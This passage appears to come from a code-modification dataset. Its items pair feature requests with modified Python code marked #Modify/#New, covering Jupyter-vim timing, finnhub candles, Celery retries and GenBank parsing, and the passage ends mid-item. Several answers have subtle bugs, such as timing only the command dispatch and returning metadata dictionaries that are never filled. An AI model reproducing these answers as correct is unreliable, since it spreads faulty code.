    <t>{'file1': "def load_item_entry(archive_directory, item_id, log_content_snippet=False):  #Modify\n  item_body_path = base.paths.item_id_to_file_path(\n      os.path.join(archive_directory, 'items'), item_id)\n  if os.path.exists(item_body_path):\n    with open(item_body_path) as item_body_file:\n      try:\n        feed = base.atom.parse(item_body_file)\n      except ET.ParseError as e:\n        logging.warning('Could not parse file %s to load item entry %s',\n            item_body_path, item_id)\n        return None\n      for entry in feed.entries:\n        if entry.item_id == item_id:\n          if log_content_snippet:  #Modify\n            logging.info('Content snippet for item %s: %s', item_id, entry.content_snippet)  #Modify\n          return entry\n    logging.warning('Did not find item entry for %s', item_id)\n  else:\n    logging.warning('No item body file entry for %s', item_id)\n\n  return None", 'file2': "for item_id in item_ids:\n    item_body_path = base.paths.item_id_to_file_path(\n        os.path.join(archive_directory, 'items'), item_id)\n    if os.path.exists(item_body_path):\n      with open(item_body_path) as item_body_file:\n        feed = base.atom.parse(item_body_file)\n        found_entry = False\n        for entry in feed.entries:\n          if entry.item_id == item_id:\n            logging.info('Body for item %s:', item_id)\n            logging.info('  %s', ET.tostring(entry.element))\n            found_entry = True\n            break\n        if not found_entry:\n          logging.warning('Did not find item body for %s', item_id)\n    else:\n      logging.warning('No item body file found for %s', item_id)\n\n  # New feature to log content snippet\n  entry = load_item_entry(archive_directory, item_id, log_content_snippet=True)  #Modify\n  if entry:\n    logging.info('Content snippet for item %s: %s', item_id, entry.content_snippet)  #New"}</t>
  </si>
  <si>
    <t>{'called_code_segment': "echom(arg, style='None') function in jupyter_util.py", 'invoking_code_segment': 'Multiple calls to echom() throughout JupyterVimSession class methods in jupyter_vim.py, particularly in connect_to_kernel(), signal_kernel(), run_file(), change_directory(), and run_command() methods', 'feature_description': 'Add a feature to log the execution time of each command sent to the kernel by tracking timestamps when commands are executed and displaying elapsed time in status messages', 'modified_complete_code': '# jupyter_util.py modifications:\n\nimport time  # #New\nfrom datetime import datetime  # #New\n\n# #New - Add execution time tracking dictionary\n_execution_times = {}  # #New\n\ndef echom(arg, style=\'None\'):  # #Modify\n    """Report `arg` using vim\'s :echomessage command.\n\n    Parameters\n    ----------\n    arg : str\n        message to print\n    style : str, optional, default=\'None\'\n        vim highlighting style of message\n    """\n    try:\n        vim.command(f"echohl {style}")\n        messages = arg.split(\'\\n\')\n        for i_line, msg in enumerate(messages):\n            prefix = \'\'\n            if i_line == 0 and style != \'None\':\n                prefix = style + \': \'\n            vim.command("echom \\"{}  {}\\"".format(prefix, msg.replace(\'\\"\', \'\\\\\\"\')))\n        vim.command("echohl None")\n    except vim.error:\n        print(f"Error: -- {arg}")\n\ndef log_execution_start(cmd_id):  # #New\n    """Log the start time of command execution.\n    \n    Parameters\n    ----------\n    cmd_id : str\n        Unique identifier for the command\n    """\n    _execution_times[cmd_id] = {\'start\': time.time(), \'cmd\': None}\n\ndef log_execution_end(cmd_id, cmd_text=\'\'):  # #New\n    """Log the end time and calculate elapsed time.\n    \n    Parameters\n    ----------\n    cmd_id : str\n        Unique identifier for the command\n    cmd_text : str, optional\n        The command text being executed\n        \n    Returns\n    -------\n    dict or None\n        Dictionary with \'elapsed\' and \'cmd\' keys, or None if cmd_id not found\n    """\n    if cmd_id not in _execution_times:\n        return None\n    _execution_times[cmd_id][\'end\'] = time.time()\n    _execution_times[cmd_id][\'cmd\'] = cmd_text\n    elapsed = _execution_times[cmd_id][\'end\'] - _execution_times[cmd_id][\'start\']\n    return {\'elapsed\': elapsed, \'cmd\': cmd_text}\n\ndef get_execution_time(cmd_id):  # #New\n    """Get execution time for a command.\n    \n    Parameters\n    ----------\n    cmd_id : str\n        Unique identifier for the command\n        \n    Returns\n    -------\n    float or None\n        Elapsed time in seconds, or None if not found\n    """\n    if cmd_id in _execution_times and \'end\' in _execution_times[cmd_id]:\n        return _execution_times[cmd_id][\'end\'] - _execution_times[cmd_id][\'start\']\n    return None\n\n# jupyter_vim.py modifications:\n\nfrom jupyter_util import str_to_py, echom, is_integer, unquote_string, get_vim, log_execution_start, log_execution_end, get_execution_time  # #Modify\nimport time  # #New\n\nclass JupyterVimSession():\n    # ... existing code ...\n    \n    @if_connected\n    def run_command(self, cmd):  # #Modify\n        """Send a single command to the kernel.\n\n        .. note:: vim command `:JupyterSendCode`.\n\n        Parameters\n        ----------\n        cmd : str\n            Lines of code to send to the kernel.\n        """\n        log_execution_start(id(cmd))  # #New\n        msg_id = self.kernel_client.execute(cmd, allow_stdin=False)\n        exec_info = log_execution_end(id(cmd), cmd)  # #New\n        if exec_info:  # #New\n            echom(f"Command executed in {exec_info[\'elapsed\']:.4f}s", style=\'WarningMsg\')  # #New\n        return (cmd, msg_id)\n\n    @if_connected\n    def send_range(self):  # #Modify\n        """Send a range of lines from the current vim buffer to the kernel.\n\n        .. note:: vim command `:JupyterSendRange`.\n        """\n        rang = vim.current.range\n        lines = "\\n".join(vim.current.buffer[rang.start:rang.end+1])\n        log_execution_start(id(lines))  # #New\n        msg_id = self.kernel_client.execute(lines, allow_stdin=False)\n        exec_info = log_execution_end(id(lines), f"range {rang.start+1}-{rang.end+1}")  # #New\n        prompt = "range {:d}-{:d} ".format(rang.start+1, rang.end+1)\n        if exec_info:  # #New\n            prompt += f"[{exec_info[\'elapsed\']:.4f}s] "  # #New\n        return (prompt, msg_id)\n\n    @if_connected\n    def run_cell(self):  # #Modify\n        """Run all the code between two cell separators.\n\n        .. note:: vim command `:JupyterSendCell`.\n        """\n        cur_buf = vim.current.buffer\n        cur_line = vim.current.window.cursor[0] - 1\n        cell_separators = get_vim(\'g:jupyter_cell_separators\', \'\')\n        cell_separators = [unquote_string(x) for x in cell_separators]\n        \n        def is_cell_separator(line):\n            for separation in cell_separators:\n                if re.match(separation, line):\n                    return True\n            return False\n        \n        upper_bound = cur_line\n        while upper_bound &gt; 0 and not is_cell_separator(cur_buf[upper_bound]):\n            upper_bound -= 1\n        if is_cell_separator(cur_buf[upper_bound]):\n            upper_bound += 1\n        lower_bound = min(upper_bound+1, len(cur_buf)-1)\n        while lower_bound &lt; len(cur_buf)-1 and not is_cell_separator(cur_buf[lower_bound]):\n            lower_bound += 1\n        if is_cell_separator(cur_buf[lower_bound]):\n            lower_bound -= 1\n        upper_bound = max(0, min(upper_bound, len(cur_buf)-1))\n        lower_bound = max(0, min(lower_bound, len(cur_buf)-1))\n        lower_bound = max(upper_bound, lower_bound)\n        \n        lines = "\\n".join(cur_buf[upper_bound:lower_bound+1])\n        log_execution_start(id(lines))  # #New\n        msg_id = self.kernel_client.execute(lines, allow_stdin=False)\n        exec_info = log_execution_end(id(lines), f"cell {upper_bound+1}-{lower_bound+1}")  # #New\n        prompt = "execute lines {:d}-{:d} ".format(upper_bound+1, lower_bound+1)\n        if exec_info:  # #New\n            prompt += f"[{exec_info[\'elapsed\']:.4f}s] "  # #New\n        return (prompt, msg_id)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'from time import time  #New\n\nclass JupyterMessenger():\n    #Modify\n    def execute(self, code, allow_stdin=False):\n        start_time = time()  #New\n        msg_id = self.kc.execute(code, allow_stdin=allow_stdin)\n        end_time = time()  #New\n        execution_time = end_time - start_time  #New\n        return msg_id, execution_time  #Modify', '#file 2': "class JupyterVimSession():\n    @if_connected\n    def run_command(self, cmd):\n        #Modify\n        msg_id, execution_time = self.kernel_client.execute(cmd, allow_stdin=False)\n        echom(f'Command executed in {execution_time:.2f} seconds.', style='Question')  #New\n        return (cmd, msg_id)  #Modify"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'finnhub.Client(api_key=os.environ["FINNHUB_API_KEY"]) and finnhub_client.stock_candles("AAPL", "D", 1590988249, 1591852249)', 'invoking_code_segment': 'import finnhub and finnhub_client.stock_candles("AAPL", "D", 1590988249, 1591852249)', 'feature_description': "Add support for optional parameter 'adjusted' in stock_candles method to allow users to retrieve adjusted or unadjusted candlestick data", 'modified_complete_code': '# finnhub-python/finnhub/__init__.py\nfrom __future__ import absolute_import\n\nfrom finnhub.client import Client\nfrom finnhub.exceptions import FinnhubAPIException, FinnhubRequestException\n\n# Note: The Client class in finnhub/client.py should have the stock_candles method modified as follows:\n# #Modify - Update stock_candles method signature to include optional \'adjusted\' parameter\n# def stock_candles(self, symbol, resolution, _from, to, adjusted=False):\n#     """Get candlestick data for a stock\n#     \n#     Args:\n#         symbol (str): Stock symbol\n#         resolution (str): Supported resolution includes 1, 5, 15, 30, 60, D, W, M\n#         _from (int): Unix timestamp. The start time of the aggregate window.\n#         to (int): Unix timestamp. The end time of the aggregate window.\n#         adjusted (bool): #New - Optional parameter to get adjusted candlestick data. Default is False.\n#     \n#     Returns:\n#         dict: Candlestick data\n#     """\n#     params = {\n#         \'symbol\': symbol,\n#         \'resolution\': resolution,\n#         \'from\': _from,\n#         \'to\': to,\n#         #New - Add adjusted parameter to request if True\n#         \'adjusted\': adjusted\n#     }\n#     return self._request_get(\'stock/candle\', params)\n\n# finnhub-python/examples.py\nimport finnhub\nimport os\n\n# Setup client\nfinnhub_client = finnhub.Client(api_key=os.environ["FINNHUB_API_KEY"])\n\nprint(finnhub_client.historical_market_cap(\'AAPL\', \'2022-01-01\', \'2024-01-01\'))\nprint(finnhub_client.company_historical_esg_score(\'AAPL\'))\n\nprint(finnhub_client.market_holiday(exchange=\'US\'))\nprint(finnhub_client.market_status(exchange=\'US\'))\n\nprint(finnhub_client.bond_yield_curve(\'10y\'))\nprint(finnhub_client.bond_tick(\'US693475BF18\', \'2022-08-19\', 500, 0, \'trace\'))\n\nprint(finnhub_client.congressional_trading(\'AAPL\', \'2020-01-01\', \'2023-03-31\'))\nprint(finnhub_client.price_metrics(symbol="AAPL", date="2022-01-01"))\n\n# Filings\nprint(finnhub_client.filings(symbol="AAPL", _from="2023-01-01", to="2023-01-15"))\n\nprint(finnhub_client.mutual_fund_eet(\'LU2036931686\'))\nprint(finnhub_client.mutual_fund_eet_pai(\'LU2036931686\'))\n\nprint(finnhub_client.isin_change(_from=\'2022-10-01\', to=\'2022-10-07\'))\nprint(finnhub_client.symbol_change(_from=\'2022-10-01\', to=\'2022-10-07\'))\nprint(finnhub_client.institutional_profile())\nprint(finnhub_client.institutional_portfolio(cik=\'1000097\', _from=\'2022-01-01\', to=\'2022-10-07\'))\nprint(finnhub_client.institutional_ownership(\'TSLA\', \'\', _from=\'2022-01-01\', to=\'2022-10-07\'))\n\n# USA Spending\nprint(finnhub_client.stock_usa_spending("LMT", "2021-01-01", "2022-06-15"))\n\nprint(finnhub_client.bond_profile(isin=\'US912810TD00\'))\nprint(finnhub_client.bond_price(\'US912810TD00\', 1590988249, 1649099548))\nprint(finnhub_client.stock_lobbying("AAPL", "2021-01-01", "2022-06-15"))\n\n# Insider sentiment\nprint(finnhub_client.stock_insider_sentiment(\'AAPL\', \'2021-01-01\', \'2022-03-01\'))\n\n# Stock candles\n#Modify - Updated stock_candles call with optional adjusted parameter\nprint(finnhub_client.stock_candles("AAPL", "D", 1590988249, 1591852249))\n#New - Example call with adjusted parameter set to True\nprint(finnhub_client.stock_candles("AAPL", "D", 1590988249, 1591852249, adjusted=True))\n\n# Aggregate Indicators\nprint(finnhub_client.aggregate_indicator("AAPL", "D"))\n\n# Basic financials\nprint(finnhub_client.company_basic_financials("AAPL", "all"))\n\n# Earnings surprises\nprint(finnhub_client.company_earnings("TSLA", limit=5))\n\n# EPS estimates\nprint(finnhub_client.company_eps_estimates("AMZN", freq="quarterly"))\n\n# Company Executives\nprint(finnhub_client.company_executive("AAPL"))\n\n# Company News\nprint(finnhub_client.company_news("AAPL", _from="2020-06-01", to="2020-06-10"))\n\n# Company Peers\nprint(finnhub_client.company_peers("AAPL"))\n\n# Company Profile\nprint(finnhub_client.company_profile(symbol="AAPL"))\nprint(finnhub_client.company_profile(isin="US0378331005"))\nprint(finnhub_client.company_profile(cusip="037833100"))\n\n# Company Profile 2\nprint(finnhub_client.company_profile2(symbol="AAPL"))\n\n# Revenue Estimates\nprint(finnhub_client.company_revenue_estimates("TSLA", freq="quarterly"))\n\n# List country\nprint(finnhub_client.country())\n\n# Crypto Exchange\nprint(finnhub_client.crypto_exchanges())\n\n# Crypto symbols\nprint(finnhub_client.crypto_symbols("BINANCE"))\n\n# Economic code\nprint(finnhub_client.economic_code()[0:5])\n\n# Economic data\nprint(finnhub_client.economic_data("MA-USA-656880"))\n\n# Economic calendar\nprint(finnhub_client.calendar_economic(\'2021-01-01\', \'2021-01-07\'))\n\n# Financials\nprint(finnhub_client.financials("AAPL", "bs", "annual"))\n\n# Financials as reported\nprint(finnhub_client.financials_reported(symbol="AAPL", freq="annual"))\n\n# Forex exchanges\nprint(finnhub_client.forex_exchanges())\n\n# Forex all pairs\nprint(finnhub_client.forex_rates(base="USD"))\n\n# Forex symbols\nprint(finnhub_client.forex_symbols("OANDA"))\n\n# Fund Ownership\nprint(finnhub_client.fund_ownership("AMZN", limit=5))\n\n# General news\nprint(finnhub_client.general_news("forex", min_id=0))\n\n# Investors ownership\nprint(finnhub_client.ownership("AAPL", limit=5))\n\n# IPO calendar\nprint(finnhub_client.ipo_calendar(_from="2020-05-01", to="2020-06-01"))\n\n# Major developments\nprint(finnhub_client.press_releases("AAPL", _from="2020-01-01", to="2020-12-31"))\n\n# News sentiment\nprint(finnhub_client.news_sentiment("AAPL"))\n\n# Pattern recognition\nprint(finnhub_client.pattern_recognition("AAPL", "D"))\n\n# Price target\nprint(finnhub_client.price_target("AAPL"))\n\n# Quote\nprint(finnhub_client.quote("AAPL"))\n\n# Recommendation trends\nprint(finnhub_client.recommendation_trends("AAPL"))\n\n# Similarity index\nprint(finnhub_client.sim_index(symbol="AAPL", freq="annual"))\n\n# Stock dividends\nprint(finnhub_client.stock_dividends("KO", _from="2019-01-01", to="2020-01-01"))\n\n# Stock dividends 2\nprint(finnhub_client.stock_basic_dividends("KO"))\n\n# Stock symbols\nprint(finnhub_client.stock_symbols("US")[0:5])\n\n# Transcripts\nprint(finnhub_client.transcripts("AAPL_162777"))\n\n# Transcripts list\nprint(finnhub_client.transcripts_list("AAPL"))\n\n# Earnings Calendar\nprint(finnhub_client.earnings_calendar(_from="2020-06-10", to="2020-06-30", symbol="", international=False))\n\n# Covid-19\nprint(finnhub_client.covid19())\n\n# Upgrade downgrade\nprint(finnhub_client.upgrade_downgrade(symbol="AAPL", _from="2020-01-01", to="2020-06-30"))\n\n# Support resistance\nprint(finnhub_client.support_resistance("AAPL", "D"))\n\n# Technical Indicator\nprint(finnhub_client.technical_indicator(symbol="AAPL", resolution="D", _from=1583098857, to=1584308457, indicator="rsi", indicator_fields={"timeperiod": 3}))\n\n# Stock splits\nprint(finnhub_client.stock_splits("AAPL", _from="2000-01-01", to="2020-01-01"))\n\n# Forex candles\nprint(finnhub_client.forex_candles("OANDA:EUR_USD", "D", 1590988249, 1591852249))\n\n# Crypto Candles\nprint(finnhub_client.crypto_candles("BINANCE:BTCUSDT", "D", 1590988249, 1591852249))\n\n# Tick Data\nprint(finnhub_client.stock_tick("AAPL", "2020-03-25", 500, 0))\n\n# BBO Data\nprint(finnhub_client.stock_nbbo("AAPL", "2020-03-25", 500, 0))\n\n# Indices Constituents\nprint(finnhub_client.indices_const(symbol="^GSPC"))\n\n# Indices Historical Constituents\nprint(finnhub_client.indices_hist_const(symbol="^GSPC"))\n\n# ETFs Profile\nprint(finnhub_client.etfs_profile("SPY"))\nprint(finnhub_client.etfs_profile(isin="US78462F1030"))\n\n# ETFs Holdings\nprint(finnhub_client.etfs_holdings("SPY"))\nprint(finnhub_client.etfs_holdings(isin="US00214Q1040", skip=2))\n\n# ETFs Industry Exposure\nprint(finnhub_client.etfs_sector_exp("SPY"))\n\n# ETFs Country Exposure\nprint(finnhub_client.etfs_country_exp("SPY"))\n\n# International Filings\nprint(finnhub_client.international_filings(\'RY.TO\'))\nprint(finnhub_client.international_filings(country=\'GB\'))\n\n# SEC Sentiment Analysis\nprint(finnhub_client.sec_sentiment_analysis(\'0000320193-20-000052\'))\n\n# SEC similarity index\nprint(finnhub_client.sec_similarity_index(\'AAPL\'))\n\n# Bid Ask\nprint(finnhub_client.last_bid_ask(\'AAPL\'))\n\n# FDA Calendar\nprint(finnhub_client.fda_calendar())\n\n# Symbol lookup\nprint(finnhub_client.symbol_lookup(\'apple\'))\n\n# Insider transactions\nprint(finnhub_client.stock_insider_transactions(\'AAPL\', \'2021-01-01\', \'2021-03-01\'))\n\n# Mutual Funds Profile\nprint(finnhub_client.mutual_fund_profile("VTSAX"))\nprint(finnhub_client.mutual_fund_profile(isin="US9229087286"))\n\n# Mutual Funds Holdings\nprint(finnhub_client.mutual_fund_holdings("VTSAX"))\nprint(finnhub_client.mutual_fund_holdings(isin="US9229087286", skip=2))\n\n# Mutual Funds Industry Exposure\nprint(finnhub_client.mutual_fund_sector_exp("VTSAX"))\n\n# Mutual Funds Country Exposure\nprint(finnhub_client.mutual_fund_country_exp("VTSAX"))\n\n# Revenue breakdown\nprint(finnhub_client.stock_revenue_breakdown(\'AAPL\'))\n\n# Social sentiment\nprint(finnhub_client.stock_social_sentiment(\'GME\'))\n\n# Investment Themes\nprint(finnhub_client.stock_investment_theme(\'financialExchangesData\'))\n\n# Supply chain\nprint(finnhub_client.stock_supply_chain(\'AAPL\'))\n\n# Company ESG\nprint(finnhub_client.company_esg_score("AAPL"))\n\n# Earnings Quality Score\nprint(finnhub_client.company_earnings_quality_score(\'AAPL\', \'quarterly\'))\n\n# Crypto Profile\nprint(finnhub_client.crypto_profile(\'BTC\'))\n\n# EBITDA Estimates\nprint(finnhub_client.company_ebitda_estimates("TSLA", freq="quarterly"))\n\n# EBIT Estimates\nprint(finnhub_client.company_ebit_estimates("TSLA", freq="quarterly"))\n\n# USPTO Patent\nprint(finnhub_client.stock_uspto_patent("AAPL", "2021-01-01", "2021-12-31"))\n\n# Visa application\nprint(finnhub_client.stock_visa_application("AAPL", "2021-01-01", "2022-06-15"))\n\n# Sector metrics\nprint(finnhub_client.sector_metric(\'NA\'))'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def stock_candles(self, symbol, resolution, _from, to, adjusted=None):\n    """Get candlestick data for stocks."""\n    _path = \'/stock/candle\'\n    _data = {\'symbol\': symbol, \'resolution\': resolution, \'from\': _from, \'to\': to}\n    if adjusted is not None:\n        _data[\'adjusted\'] = adjusted  #Modify\n    return self._get_response(_path, params=_data)', '#file 2': 'print(finnhub_client.stock_candles("AAPL", "D", 1590988249, 1591852249, adjusted=\'split\'))  #Modify\n\n#New\n# Example of using the \'adjusted\' parameter\nprint(finnhub_client.stock_candles("AAPL", "D", 1590988249, 1591852249, adjusted=\'dividend\'))'}</t>
  </si>
  <si>
    <t>{'called_code_segment': '@celery.task(name="create_task")\ndef create_task(task_type):\n    time.sleep(int(task_type) * 10)\n    return True', 'invoking_code_segment': 'def test_task():\n    assert create_task.run(1)\n    assert create_task.run(2)\n    assert create_task.run(3)\n\n@patch("worker.create_task.run")\ndef test_mock_task(mock_run):\n    assert create_task.run(1)\n    create_task.run.assert_called_once_with(1)\n    assert create_task.run(2)\n    assert create_task.run.call_count == 2\n    assert create_task.run(3)\n    assert create_task.run.call_count == 3', 'feature_description': 'Add a retry mechanism for failed tasks with exponential backoff. The create_task function now retries up to 3 times on failure with exponential backoff delays (2^retry seconds). Tests are updated to verify retry behavior and mock the retry mechanism.', 'modified_complete_code': '# fastapi-celery/project/worker.py\nimport os\nimport time\n\nfrom celery import Celery\nfrom celery.exceptions import MaxRetriesExceededError\n\n\ncelery = Celery(__name__)\ncelery.conf.broker_url = os.environ.get("CELERY_BROKER_URL", "redis://localhost:6379")\ncelery.conf.result_backend = os.environ.get("CELERY_RESULT_BACKEND", "redis://localhost:6379")\n\n\n#Modify\n@celery.task(name="create_task", bind=True, max_retries=3)\ndef create_task(self, task_type):\n    try:\n        time.sleep(int(task_type) * 10)\n        return True\n    #New\n    except Exception as exc:\n        retry_count = self.request.retries\n        countdown = 2 ** retry_count\n        if retry_count &lt; self.max_retries:\n            raise self.retry(exc=exc, countdown=countdown)\n        else:\n            raise MaxRetriesExceededError(f"Task failed after {self.max_retries} retries")\n\n\n# fastapi-celery/project/tests/test_tasks.py\nimport json\nfrom unittest.mock import patch, MagicMock\n\nfrom worker import create_task\n\n\ndef test_home(test_app):\n    response = test_app.get("/")\n    assert response.status_code == 200\n\n\ndef test_task():\n    assert create_task.run(1)\n    assert create_task.run(2)\n    assert create_task.run(3)\n\n\n#Modify\n@patch("worker.create_task.retry")\n@patch("worker.create_task.run")\ndef test_mock_task(mock_run, mock_retry):\n    mock_run.return_value = True\n    assert create_task.run(1)\n    create_task.run.assert_called_once_with(1)\n\n    assert create_task.run(2)\n    assert create_task.run.call_count == 2\n\n    assert create_task.run(3)\n    assert create_task.run.call_count == 3\n\n\n#New\ndef test_task_retry_mechanism(test_app):\n    with patch("worker.create_task.retry") as mock_retry:\n        mock_retry.side_effect = Exception("Simulated failure")\n        try:\n            create_task.run(1)\n        except Exception:\n            pass\n        assert mock_retry.called\n\n\ndef test_task_status(test_app):\n    response = test_app.post(\n        "/tasks",\n        data=json.dumps({"type": 1})\n    )\n    content = response.json()\n    task_id = content["task_id"]\n    assert task_id\n\n    response = test_app.get(f"tasks/{task_id}")\n    content = response.json()\n    assert content == {"task_id": task_id, "task_status": "PENDING", "task_result": None}\n    assert response.status_code == 200\n\n    while content["task_status"] == "PENDING":\n        response = test_app.get(f"tasks/{task_id}")\n        content = response.json()\n    assert content == {"task_id": task_id, "task_status": "SUCCESS", "task_result": True}'}</t>
  </si>
  <si>
    <t>{'worker.py': '#Modify\n@celery.task(name="create_task")\ndef create_task(task_type, retries=3):\n    try:\n        time.sleep(int(task_type) * 10)\n        return True\n    except Exception as e:\n        if retries &gt; 0:\n            return create_task(task_type, retries=retries-1)\n        else:\n            raise e', 'test_tasks.py': '#Modify\n@patch("worker.create_task.run")\ndef test_mock_task(mock_run):\n    assert create_task.run(1)\n    create_task.run.assert_called_once_with(1)\n\n    assert create_task.run(2)\n    assert create_task.run.call_count == 2\n\n    assert create_task.run(3)\n    assert create_task.run.call_count == 3\n\n#New\ndef test_task_retry(test_app):\n    response = test_app.post(\n        "/tasks",\n        data=json.dumps({"type": 1})\n    )\n    content = response.json()\n    task_id = content["task_id"]\n    assert task_id\n\n    response = test_app.get(f"tasks/{task_id}")\n    content = response.json()\n    assert content == {"task_id": task_id, "task_status": "PENDING", "task_result": None}\n    assert response.status_code == 200\n\n    while content["task_status"] == "PENDING":\n        response = test_app.get(f"tasks/{task_id}")\n        content = response.json()\n    assert content == {"task_id": task_id, "task_status": "SUCCESS", "task_result": True}'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'parse_feature_table(ft_file) function in sparta.py that parses feature keys and qualifier keys from the feature table file', 'invoking_code_segment': 'main() function in genbank_to_ontology.py that calls parse_feature_table(ft_file) and uses the returned feature_keys and qual_keys', 'feature_description': 'Add support for parsing additional metadata from the feature table file, including feature descriptions, qualifier descriptions, and cardinality information. This enhancement allows the ontology mapping system to capture richer semantic information about GenBank features and qualifiers beyond just their names.', 'modified_complete_code': '# Modified parse_feature_table function in genbank_to_ontology.py\ndef parse_feature_table(ft_file):\n    """Parse all available features and qualifiers from the FT definition.\n\n    This is ugly and parses it straight out of the HTML but this is much easier\n    than trying to get it from the specs.\n    #Modify: Extended to capture additional metadata\n    """\n    feature_keys = []\n    qual_keys = []\n    #New: Add dictionaries to store metadata\n    feature_descriptions = {}\n    qualifier_descriptions = {}\n    qualifier_cardinality = {}\n    \n    with open(ft_file) as ft_handle:\n        in_feature_region = False\n        current_feature = None\n        for line in ft_handle:\n            if in_feature_region:\n                if line.strip() == "":\n                    in_feature_region = False\n                else:\n                    parts = line.strip().split()\n                    if len(parts) &gt;= 2:\n                        qual_key = parts[0]\n                        feature_key = parts[1]\n                        #New: Extract description if present (parts[2:])\n                        description = \' \'.join(parts[2:]) if len(parts) &gt; 2 else \'\'\n                        qual_keys.append(qual_key)\n                        feature_keys.append(feature_key)\n                        current_feature = feature_key\n                        #New: Store qualifier description and cardinality info\n                        if description:\n                            qualifier_descriptions[qual_key] = description\n                            #New: Parse cardinality from description (e.g., \'(0 or 1)\', \'(1 or more)\')\n                            if \'(0 or 1)\' in description:\n                                qualifier_cardinality[qual_key] = \'optional\'\n                            elif \'(1 or more)\' in description:\n                                qualifier_cardinality[qual_key] = \'multiple\'\n                            elif \'(exactly 1)\' in description:\n                                qualifier_cardinality[qual_key] = \'required\'\n            elif line.find(\'QUALIFIER FEATURE KEY\') == 0:\n                in_feature_region = True\n    \n    qual_keys = list(set(qual_keys))\n    qual_keys = [k.replace(\'/\', \'\') for k in qual_keys]\n    feature_keys = list(set(feature_keys))\n    qual_keys.sort()\n    feature_keys.sort()\n    #Modify: Return additional metadata dictionaries\n    return feature_keys, qual_keys, feature_descriptions, qualifier_descriptions, qualifier_cardinality\n\n# Modified main function in genbank_to_ontology.py\ndef main(ft_file, so_ft_map_file, so_file, dc_file, rdfs_file):\n    # -- get all of the keys we need to map from GenBank\n    # pulled by hand from the Biopython parser\n    header_keys = [\'ACCESSION\', \'AUTHORS\', \'COMMENT\', \'CONSRTM\', \'DBLINK\',\n            \'DBSOURCE\', \'DEFINITION\', \'JOURNAL\', \'KEYWORDS\', \'MEDLINE\', \'NID\',\n            \'ORGANISM\', \'PID\', \'PROJECT\', \'PUBMED\',\n            \'REMARK\', \'SEGMENT\', \'SOURCE\', \'TITLE\', \'VERSION\',\n            \'VERSION;gi\', \'LOCUS;date\']\n    #Modify: Unpack additional metadata from parse_feature_table\n    feature_keys, qual_keys, feature_descriptions, qualifier_descriptions, qualifier_cardinality = parse_feature_table(ft_file)\n\n    # -- terms to map them two, along with dictionaries for the existing or\n    # hand defined mappings\n    dc_terms = parse_dc_terms(dc_file)\n    dc_ontology = OntologyGroup("http://purl.org/dc/terms/", dc_terms)\n    so_terms = parse_so_terms(so_file)\n    so_ontology = OntologyGroup("http://purl.org/obo/owl/SO", so_terms)\n    so_ft_map = parse_so_ft_map(so_ft_map_file)\n    so_ontology.add_map(\'feature\', \n            \'http://www.sequenceontology.org/mappings/FT_SO_map.txt\', so_ft_map)\n    rdfs_terms = parse_rdfs_terms(rdfs_file)\n    rdfs_ontology = OntologyGroup(\'http://www.w3.org/2000/01/rdf-schema#\',\n            rdfs_terms)\n    \n    #New: Store metadata in ontology groups for reference\n    so_ontology.feature_descriptions = feature_descriptions\n    so_ontology.qualifier_descriptions = qualifier_descriptions\n    so_ontology.qualifier_cardinality = qualifier_cardinality\n    \n    me_ft_map = dict(\n            rep_origin = \'origin_of_replication\',\n            unsure = \'sequence_uncertainty\',\n            conflict = \'sequence_conflict\',\n            GC_signal = \'GC_rich_promoter_region\',\n            mat_peptide = \'mature_protein_region\',\n            C_region = \'C_cluster\',\n            J_segment = \'J_gene\',\n            N_region = \'\',\n            S_region = \'\',\n            V_region = \'V_cluster\',\n            V_segment = \'V_gene\'\n            )\n    me_ft_dc_map = dict(\n            old_sequence = \'replaces\')\n    me_hd_map = {\'ACCESSION\': \'databank_entry\'}\n    me_hd_dc_map = {\'DEFINITION\' : \'description\',\n                    \'VERSION\' : \'hasVersion\',\n                    \'VERSION;gi\' : \'identifier\',\n                    \'KEYWORDS\' : \'subject\',\n                    \'LOCUS;date\' : \'created\',\n                    \'PUBMED\' : \'relation\',\n                    \'JOURNAL\' : \'source\',\n                    \'AUTHORS\' : \'contributor\',\n                    \'CONSRTM\' : \'creator\',\n                    \'ORGANISM\' : \'\',\n                    \'SEGMENT\' : \'isPartOf\',\n                    \'DBLINK\' : \'relation\',\n                    \'DBSOURCE\' : \'relation\',\n                    \'MEDLINE\' : \'relation\',\n                    \'NID\' : \'relation\',\n                    \'PID\' : \'relation\',\n                    \'PROJECT\' : \'relation\'}\n    me_ql_map = dict(\n            bio_material = \'biomaterial_region\',\n            bound_moiety = \'bound_by_factor\',\n            codon_start = \'coding_start\',\n            direction = \'direction_attribute\',\n            experiment = \'experimental_result_region\',\n            macronuclear = \'macronuclear_sequence\',\n            map = \'fragment_assembly\',\n            mobile_element = \'integrated_mobile_genetic_element\',\n            mod_base = \'modified_base_site\',\n            mol_type = \'sequence_attribute\',\n            ncRNA_class = \'ncRNA\',\n            organelle = \'organelle_sequence\',\n            PCR_primers = \'primer\',\n            proviral = \'proviral_region\',\n            pseudo = \'pseudogene\',\n            rearranged = \'rearranged_at_DNA_level\',\n            satellite = \'satellite_DNA\',\n            segment = \'gene_segment\',\n            rpt_family = \'repeat_family\',\n            rpt_type = \'repeat_unit\',\n            rpt_unit_range = \'repeat_region\',\n            rpt_unit_seq = \'repeat_component\',\n            tag_peptide = \'cleaved_peptide_region\',\n            trans_splicing = \'trans_spliced\',\n            translation = \'polypeptide\',\n            )\n    me_ql_dc_map = dict(\n            citation = \'bibliographicCitation\',\n            gene_synonym = \'alternative\',\n            identified_by = \'creator\',\n            label = \'alternative\',\n            locus_tag = \'alternative\',\n            old_locus_tag = \'replaces\',\n            replace = \'isReplacedBy\',\n            db_xref = \'relation\',\n            compare = \'relation\',\n            EC_number = \'relation\',\n            protein_id = \'relation\',\n            product = \'alternative\',\n            standard_name = \'alternative\',\n            number = \'coverage\',\n            function = \'description\',\n            )\n    me_ql_rdfs_map = dict(\n            note = \'comment\',\n            )\n    ql_make_no_sense_list = [\'number\']\n    so_ontology.add_map(\'header\', \'Brad\', me_hd_map)\n    so_ontology.add_map(\'feature\', \'Brad\', me_ft_map)\n    so_ontology.add_map(\'qualifier\', \'Brad\', me_ql_map)\n    dc_ontology.add_map(\'header\', \'Brad\', me_hd_dc_map)\n    dc_ontology.add_map(\'feature\', \'Brad\', me_ft_dc_map)\n    dc_ontology.add_map(\'qualifier\', \'Brad\', 